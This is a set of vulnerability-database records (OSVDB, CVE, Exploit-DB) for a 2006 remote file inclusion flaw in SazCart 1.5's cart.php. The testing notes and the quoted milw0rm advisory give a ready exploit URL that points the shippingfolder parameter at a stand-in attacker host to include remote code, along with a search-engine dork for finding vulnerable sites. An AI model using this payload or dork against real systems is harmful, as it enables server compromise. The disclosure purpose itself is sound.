{"bulletinFamily": "software", "viewCount": 4, "reporter": "IbnuSina()", "references": [], "description": "## Vulnerability Description\nSazCart contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to cart.php not properly sanitizing user input supplied to the '_saz[settings][shippingfolder]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nSazCart contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to cart.php not properly sanitizing user input supplied to the '_saz[settings][shippingfolder]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[sazcart PATH]/admin/controls/cart.php?_saz[settings][shippingfolder]=HTTP://EVILCODE?\n## References:\nVendor URL: http://sazcart.com/\n[Secunia Advisory ID:22708](https://secuniaresearch.flexerasoftware.com/advisories/22708/)\nMail List Post: http://attrition.org/pipermail/vim/2007-January/001232.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0291.html\nISS X-Force ID: 30013\nGeneric Exploit URL: http://milw0rm.com/exploits/2718\nFrSIRT Advisory: ADV-2006-4343\n[CVE-2006-5727](https://vulners.com/cve/CVE-2006-5727)\nBugtraq ID: 20922\n", "affectedSoftware": [{"operator": "eq", "version": "1.5", "name": "SazCart"}], "href": "https://vulners.com/osvdb/OSVDB:30194", "modified": "2006-11-04T05:49:02", "enchantments": {"score": {"value": 6.6, "vector": "NONE", "modified": "2017-04-28T13:20:26", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-5727"]}, {"type": "exploitdb", "idList": ["EDB-ID:2718"]}], "modified": "2017-04-28T13:20:26", "rev": 2}, "vulnersScore": 6.6}, "id": "OSVDB:30194", "title": "SazCart cart.php _saz[settings][shippingfolder] Variable Remote File Inclusion", "edition": 1, "published": "2006-11-04T05:49:02", "type": "osvdb", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "cvelist": ["CVE-2006-5727"], "lastseen": "2017-04-28T13:20:26"}

{"cve": [{"lastseen": "2021-02-02T05:27:25", "description": "PHP remote file inclusion vulnerability in admin/controls/cart.php in sazcart 1.5 allows remote attackers to execute arbitrary PHP code via the (1) _saz[settings][shippingfolder] and (2) _saz[settings][taxfolder] parameters.\nSuccessful exploitation requires that \"register_globals\" is enabled.", "edition": 4, "cvss3": {}, "published": "2006-11-06T17:07:00", "title": "CVE-2006-5727", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-5727"], "modified": "2018-10-17T21:44:00", "cpe": ["cpe:/a:sazcart:sazcart:1.5"], "id": "CVE-2006-5727", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-5727", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:sazcart:sazcart:1.5:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-01-31T16:53:19", "description": "SazCart <= 1.5 (cart.php) Remote File Include Vulnerability. CVE-2006-5727. Webapps exploit for php platform", "published": "2006-11-04T00:00:00", "type": "exploitdb", "title": "SazCart <= 1.5 cart.php Remote File Include Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5727"], "modified": "2006-11-04T00:00:00", "id": "EDB-ID:2718", "href": "https://www.exploit-db.com/exploits/2718/", "sourceData": "sazcart v1.5 (cart.php) Remote File include\n*********************---Hitamputih crew---******************************** \n* Bug Found By : IbnuSina\n* vendor : http://sazcart.com/site\n*Risk : High\n* Greetz : *Solpot,permenhack,barbarosa,cah|gemblunkz,fung_men,setiawan,irvian,meteoroid\n* and all member hitamputih crew community www.kaipank.org/forum\n*especially thx to str0ke@milw0rm.com \n***************************************************************************\nbug found on admin/controls/cart.php\ninclude($_saz['settings']['shippingfolder'] . \"/shipping.php\");\n$Shipping = new Shipping;\ninclude($_saz['settings']['taxfolder'] . \"/tax.php\");\n$Tax = new Tax;\n\nexploit :\nhttp://sitename.com/[sazcart PATH]/admin/controls/cart.php?_saz[settings][shippingfolder]=HTTP://EVILCODE?\ngoogle dork: \"powered by sazcart\"\n\n# milw0rm.com [2006-11-04]\n", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2718/"}]}